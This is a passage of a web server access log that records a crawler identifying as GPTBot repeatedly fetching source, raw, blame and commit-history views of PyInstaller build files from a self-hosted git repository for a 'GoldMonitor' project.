"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10915] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9913] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10916] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9910] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21828] [Gzip 12.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21827] [Gzip 12.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73542] [Gzip 20.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10916] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14301] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14301] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9907] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10917] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10916] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73542] [Gzip 20.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9909] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9909] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9911] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10930] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:14:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10931] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:14:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21801] [Gzip 12.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21800] [Gzip 12.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10940] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:14:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10939] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:14:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:14:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:14:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:14:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11063] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:14:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11063] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:14:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" +[17/Feb/2026:14:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" +[17/Feb/2026:14:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 